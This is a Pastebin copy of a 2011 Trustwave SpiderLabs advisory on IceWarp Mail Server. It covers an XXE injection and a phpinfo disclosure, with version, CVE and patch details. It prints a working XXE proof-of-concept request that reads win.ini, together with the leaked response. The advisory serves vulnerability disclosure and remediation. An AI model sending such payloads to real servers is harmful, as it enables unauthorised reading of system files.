API tools faq
paste
Advertisement
ugo22g

IceWarp Mail Server Injection / Information Disclosure

ugo22g
Sep 27th, 2011
698
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.07 KB | None | 0 0
raw download clone embed print report
  1. Published: 2011-09-23
  2. Version: 1.0
  3.  
  4. Vendor: IceWarp (http://www.icewarp.com)
  5. Product: IceWarp Mail Server
  6. Version affected: 10.3.2 and below
  7.  
  8. Product description: IceWarp WebMail is the web front-end for the IceWarp
  9. Mail Server, which provides email access on over 50,000 servers. IceWarp
  10. WebMail provides web-based access to email, calendars, contacts, files
  11. and shared data from any computer with a browser and Internet connection.
  12.  
  13. Credit: David Kirkpatrick of Trustwave's SpiderLabs
  14.  
  15. Finding 1: XML External Entity Injection
  16. CVE: CVE-2011-3579
  17.  
  18. An external entity is a function of the XML specification which allows XML
  19. documents to reference resources external to the XML document. This
  20. functionality forces the XML parser of the application to access the
  21. resource specified.
  22.  
  23. In this case it is possible to inject an XML DOCTYPE "SYSTEM" directive to
  24. access local files on the operating system where the IceWarp server is
  25. installed. Using this technique it is possible to retrieve readable files
  26. on the operating system. This attack can also be used to create a possible
  27. denial of service condition.
  28.  
  29. Proof-of-Concept:
  30.  
  31. The following POST request was sent to the host A.B.C.D where the IceWarp
  32. mail server was running:
  33.  
  34. REQUEST
  35. =========
  36. POST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1
  37. Host:A.B.C.D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0)
  38. Gecko/20100101 Firefox/5.0
  39. Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  40. Accept-Language:en-gb,en;q=0.5i've
  41. Accept-Encoding: gzip, deflate
  42. Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  43. Proxy-Connection: keep-alive
  44. Referer: http://A.B.C.D
  45. Content-Length: 249
  46. Content-Type: application/xml;charset=UTF-8
  47. Pragma: no-cache
  48. Cache-Control: no-cache
  49.  
  50. <!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini"> ]><iq
  51. type="set"><query
  52. xmlns="webmail:iq:auth"><username>test&xxeb91c4;</username><digest>828cd27c
  53. 6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffc
  54. d2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method><
  55. /query></iq>
  56.  
  57. RESPONSE:
  58. ==========
  59. HTTP/1.1 200 OK
  60. Server: IceWarp/9.4.2
  61. Date: Wed, 20 Jul 2011 10:04:56 GMT
  62. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  63. Cache-Control:no-store, no-cache, must-revalidate, post-check=0,
  64. pre-check=0 Pragma: no-cache
  65. Content-Type: text/xml
  66. Vary: Accept-Encoding
  67. Content-Length: 1113
  68.  
  69. <?xml version="1.0" encoding="utf-8"?><iq type="error"><error
  70. uid="login_invalid">test; for 16-bit app support
  71. [fonts]
  72. [extensions]
  73. [mci extensions]
  74. [files]
  75. [Mail]
  76. MAPI=1
  77. ....TRUNCATED
  78.  
  79. The above proof-of-concept would retrieve the c:\windows\win.ini file (the
  80. response in this example has been truncated).
  81.  
  82.  
  83. Finding 2: PHP Information Disclosure
  84. CVE: CVE-2011-3580
  85.  
  86. It is possible to retrieve the PHP information file phpinfo() by accessing
  87. the following URL http://A.B.C.D/server where A.B.C.D is the IP of the
  88. server running the IceWarp software. The response will be a page detailing
  89. the PHP version used and the configuration settings of PHP, including
  90. system details.
  91.  
  92.  
  93. Vendor Response: These issues have been addressed as of version 10.3.3
  94.  
  95. Remediation Steps: Customers should update to the latest version of IceWarp
  96. Mail Server in order to address these issues. The above issues have been
  97. corrected in version 10.3.3.
  98.  
  99. Revision History:
  100. 08/03/11 - Vulnerability disclosed
  101. 09/19/11 - Patch released
  102. 09/23/11 - Advisory published
  103.  
  104.  
  105. About Trustwave: Trustwave is the leading provider of on-demand and
  106. subscription-based information security and payment card industry
  107. compliance management solutions to businesses and government entities
  108. throughout the world. For organizations faced with today's challenging
  109. data security and compliance environment, Trustwave provides a unique
  110. approach with comprehensive solutions that include its flagship
  111. TrustKeeper compliance management software and other proprietary security
  112. solutions. Trustwave has helped thousands of organizations--ranging from
  113. Fortune 500 businesses and large financial institutions to small and
  114. medium-sized retailers--manage compliance and secure their network
  115. infrastructure, data communications and critical information assets.
  116. Trustwave is headquartered in Chicago with offices throughout North
  117. America, South America, Europe, Africa, China and Australia.
  118.  
  119. About Trustwave's SpiderLabs: SpiderLabs is the advance security team at
  120. Trustwave responsible for incident response and forensics, ethical hacking
  121. and application security tests for Trustwave's clients. SpiderLabs has
  122. responded to hundreds of security incidents, performed thousands of ethical
  123. hacking exercises and tested the security of hundreds of business
  124. applications for Fortune 500 organizations. For more information visit
  125. https://www.trustwave.com/spiderlabs
  126.  
  127. Disclaimer: The information provided in this advisory is provided "as is"
  128. without warranty of any kind. Trustwave disclaims all warranties, either
  129. express or implied, including the warranties of merchantability and fitness
  130. for a particular purpose. In no event shall Trustwave or its suppliers be
  131. liable for any damages whatsoever including direct, indirect, incidental,
  132. consequential, loss of business profits or special damages, even if
  133. Trustwave or its suppliers have been advised of the possibility of such
  134. damages. Some states do not allow the exclusion or limitation of liability
  135. for consequential or incidental damages so the foregoing limitation may not
  136. apply.
  137.  
  138.  
  139.  
  140.  
  141. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
  142.  
  143. //////////////////////////////////////////////////////////////////////////////////////////::
  144.  
  145. WEB: http://h4ck3r.ze-forum.com
  146.  
  147.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!